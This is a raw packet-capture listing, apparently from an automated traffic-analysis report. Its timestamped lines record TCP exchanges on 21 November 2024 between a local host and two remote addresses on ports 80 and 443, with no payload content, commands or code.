                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.643306017 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.644068956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.644121885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.644197941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.644248962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.645165920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.645217896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.645267963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.645322084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.646244049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.646291971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.646377087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.646424055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.647406101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.647459984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.647478104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.647526026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.648430109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.648480892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.648571014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.648617983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.649502039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.649554014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.649704933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.649775982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.650636911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.650693893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.650707960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.650760889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.651690960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.651746988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.651798964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.651854038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.652811050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.652863026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.652908087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.652961016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.653865099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.653934956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.653975964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.654066086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.654953003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.655014038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.655087948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.655177116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.656059027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.656111956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.656188965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.656241894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.669903040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.669950962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.669959068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.669990063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.669995070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670017958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670032978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670037985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670061111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670063019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670077085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670088053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670104027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670108080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670135975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670139074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670146942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670155048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670171022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670181990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670186043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670200109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670201063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670217991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670217991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670233965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670236111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670250893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670253992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670268059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670286894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670293093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670321941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670337915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670352936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670372963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670386076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670403957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670413017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670419931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670433998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670449972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670468092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670468092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670481920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670484066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670507908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.670528889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.671320915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.671374083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.671492100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.671540976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.672411919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.672462940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.672513008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.672560930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.673504114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.673553944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.673609972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.673656940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.674621105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.674671888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.674712896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.674761057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.675667048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.675717115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.675785065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.675832033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.676904917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.676956892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.677002907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.677095890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.677896023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.677946091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.677985907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.678034067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.678998947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.679049969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.679107904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.679156065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.680046082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.680135965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.680253029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.680301905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.681133986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.681183100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.681246996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.681293964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.682226896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.682279110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.682446003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.682497025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.683331966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.683379889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.698223114 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.698606968 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.698616982 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.699186087 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.699192047 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.790451050 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.791069031 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.791099072 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.791654110 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.791657925 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.803411961 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.803893089 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.803925037 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.807199955 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.807209969 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.836592913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.836626053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.836680889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.836704016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.837127924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.837188005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.837204933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.837255955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.838133097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.838190079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.838248014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.838301897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.839193106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.839242935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.839252949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.839292049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.840351105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.840375900 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.840425968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.840466022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.841379881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.841444969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.841485023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.841537952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.842478991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.842545986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.842622042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.842677116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.843839884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.843907118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.843916893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.844011068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.844703913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.844757080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.844825029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.844873905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.845758915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.845809937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.845884085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.845931053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.846834898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.846888065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.846967936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.847013950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.847903013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.847955942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.847999096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.848045111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.849042892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.849095106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.849179029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.849245071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.850089073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.850141048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.850193977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.850240946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.851180077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.851238012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.851298094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.851368904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.852260113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.852382898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.852390051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.852435112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.853378057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.853446007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.853498936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.853555918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.854583979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.854643106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.854695082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.854741096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.855534077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.855607033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.855655909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.855720997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.856616974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.856683016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.856724024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.856781960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.857701063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.857764959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.857819080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.857916117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.858812094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.858880043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.858943939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.858999014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.859905005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.859971046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.860052109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.860111952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.861011028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.861073971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.861110926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.861159086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.862092018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.862163067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.862243891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.862318993 CET4977080192.168.2.431.41.244.11
